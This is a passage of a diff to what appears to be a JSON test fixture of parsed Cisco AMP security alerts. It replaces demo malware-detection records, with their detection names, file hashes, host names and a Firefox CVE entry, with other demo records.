"host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 274588, + "log.offset": 35375, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4899,60 +1285,64 @@ ] }, { - "@timestamp": "2021-01-15T10:11:44.000Z", + "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257564007727167", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643249", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 218000000, + "cisco.amp.timestamp_nanoseconds": 951000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257564007727000, + "event.id": 6533669929038643000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 275907, + "log.offset": 36701, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4960,60 +1350,64 @@ ] }, { - "@timestamp": "2021-01-15T10:11:32.000Z", + "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257512468119614", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643248", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 581000000, + "cisco.amp.timestamp_nanoseconds": 576000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257512468120000, + "event.id": 6533669929038643000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 277226, + "log.offset": 38020, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5021,60 +1415,66 @@ ] }, { - "@timestamp": "2021-01-15T10:11:20.000Z", + "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257460928512061", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605487", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 569000000, + "cisco.amp.timestamp_nanoseconds": 333000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257460928512000, + "event.id": 6533669671340605000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 278545, + "log.offset": 39339, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5082,64 +1482,58 @@ ] }, { - "@timestamp": "2021-01-15T10:11:18.000Z", + "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.detection_id": "5825617812646789131", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605486", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 875000000, + "cisco.amp.timestamp_nanoseconds": 195000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5825617812646789000, + "event.id": 6533669671340605000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "bfcc0861c7fb965c1f7473d3dc42cff6", - "file.hash.sha1": "420da91c3199993c9f245b21ea060b69d7ecfd49", - "file.hash.sha256": "aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33", - "file.name": "5A.tmp", - "file.path": "\\\\?\\C:\\WINDOWS\\Temp\\5A.tmp", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.os.family": "windows", "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 279864, - "process.hash.md5": "60784f891563fb1b767f70117fc2428f", - "process.hash.sha1": "e6e904b84332191d44de729deb7bfed9bcef2ce9", - "process.hash.sha256": "e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f", - "process.name": "spoolsv.exe", - "process.pid": 1480, + "log.offset": 40665, "related.hash": [ - "aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33", - "bfcc0861c7fb965c1f7473d3dc42cff6", - "420da91c3199993c9f245b21ea060b69d7ecfd49" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_TDSS" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", @@ -5155,62 +1549,56 @@ ] }, { - "@timestamp": "2021-01-15T10:11:17.000Z", + "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.detection_id": "5825617808351821830", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605485", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 812000000, + "cisco.amp.timestamp_nanoseconds": 170000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5825617808351822000, + "event.id": 6533669671340605000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "4a052246c5551e83d2d55f80e72f03eb", - "file.hash.sha1": "bc29f1e8460915596e1dcafd0c92d6309457d149", - "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "file.name": "59.tmp", - "file.path": "\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\59.tmp", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 287092, - "process.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "process.name": "tdss.exe", - "process.pid": 3728, + "log.offset": 41991, "related.hash": [ - "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "4a052246c5551e83d2d55f80e72f03eb", - "bc29f1e8460915596e1dcafd0c92d6309457d149" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_TDSS" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", @@ -5226,60 +1614,64 @@ ] }, { - "@timestamp": "2021-01-15T10:11:09.000Z", + "@timestamp": "2021-01-15T10:20:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257409388904508", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669667045638188", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 56000000, + "cisco.amp.timestamp_nanoseconds": 779000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257413683872000, + "event.id": 6533669667045638000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 294937, + "log.offset": 43310, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5287,50 +1679,62 @@ ] }, { - "@timestamp": "2021-01-15T10:10:59.000Z", + "@timestamp": "2021-01-15T10:20:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "f5:8f:96:c3:53:1c" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.event_type_id": 1107296272, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.related.cve": [ + "CVE-2015-7204" + ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "f5:8f:96:c3:53:1c" ], - "cisco.amp.timestamp_nanoseconds": 267000000, - "event.action": "Executed malware", + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2015-7204", + "name": "Mozilla Firefox", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204", + "version": "41.0" + } + ], + "event.action": "Vulnerable Application Detected", "event.category": [ - "malware" + "file" ], "event.dataset": "cisco.amp", - "event.id": 1489955900267000300, + "event.id": 15210587194928, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:10:59.000Z", - "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "event.severity": 1, + "event.start": "2021-01-15T10:20:00.000Z", + "file.hash.sha256": "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f", + "file.name": "firefox.exe", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", + "host.hostname": "Demo_AMP_Exploit_Prevention", + "host.name": "Demo_AMP_Exploit_Prevention", "input.type": "log", - "log.offset": 296255, - "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", + "log.offset": 44629, + "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", "related.hash": [ - "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5" + "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f" ], "related.hosts": [ - "Demo_TDSS" + "Demo_AMP_Exploit_Prevention" ], "related.ip": [ "8.8.8.8", @@ -5343,60 +1747,66 @@ ] }, { - "@timestamp": "2021-01-15T10:10:56.000Z", + "@timestamp": "2021-01-15T10:19:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257357849296955", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669409347600427", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 607000000, + "cisco.amp.timestamp_nanoseconds": 257000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257357849297000, + "event.id": 6533669409347600000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 297536, + "log.offset": 46087, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5404,7 +1814,7 @@ ] }, { - "@timestamp": "2021-01-15T10:10:53.000Z", + "@timestamp": "2021-01-15T10:19:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -5416,7 +1826,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667064295456780", + "cisco.amp.detection_id": "6533669409347600426", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -5425,14 +1835,14 @@ "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 478000000, + "cisco.amp.timestamp_nanoseconds": 240000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533667064295457000, + "event.id": 6533669409347600000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -5440,15 +1850,13 @@ "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 298855, + "log.offset": 47413, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -5471,60 +1879,64 @@ ] }, { - "@timestamp": "2021-01-15T10:10:52.000Z", + "@timestamp": "2021-01-15T10:19:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257340669427770", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669405052633129", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 988000000, + "cisco.amp.timestamp_nanoseconds": 847000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257340669428000, + "event.id": 6533669405052633000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 300181, + "log.offset": 48732, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5532,7 +1944,7 @@ ] }, { - "@timestamp": "2021-01-15T10:10:51.000Z", + "@timestamp": "2021-01-15T10:18:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -5543,8 +1955,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533667055705522187", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669147354595368", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -5553,14 +1965,14 @@ "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 565000000, + "cisco.amp.timestamp_nanoseconds": 375000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533667055705522000, + "event.id": 6533669147354595000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -5576,7 +1988,7 